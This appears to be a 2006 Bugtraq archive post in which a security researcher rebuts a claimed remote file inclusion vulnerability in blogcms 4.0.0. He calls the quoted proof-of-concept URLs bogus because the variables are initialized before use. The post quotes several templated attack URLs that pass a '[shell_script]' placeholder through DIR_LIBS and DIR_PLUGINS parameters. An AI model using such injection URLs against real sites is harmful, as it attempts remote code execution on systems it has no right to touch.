Bugtraq mailing list archives

Re: blogcms => 4.0.0 Remote File Include

From: Stefano Zanero <s.zanero () securenetwork it>
Date: Fri, 17 Nov 2006 20:17:07 +0100

the_3dit0r () yahoo com wrote:

# CodE : 
  require_once('themes/' . $blog_theme . '/user_style.php');


Bogus...

# Expl0itS : 
 http://Site/[path]/index.php?DIR_PLUGINS=[shell_script]


Bogus, initialized in config file included

 http://Site/[path]/install.php?DIR_LIBS=[shell_script]


Bogus, initialized before being used

 http://Site/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script]
 http://Site/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell_script]
 http://Site/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_script]
 http://Site/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[shell_script]
 http://Site/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]


Classes and functions, that for what I see cannot be called like that.

Stefano

Current thread:

blogcms => 4.0.0 Remote File Include the_3dit0r (Nov 16)
- Re: blogcms => 4.0.0 Remote File Include Stefano Zanero (Nov 17)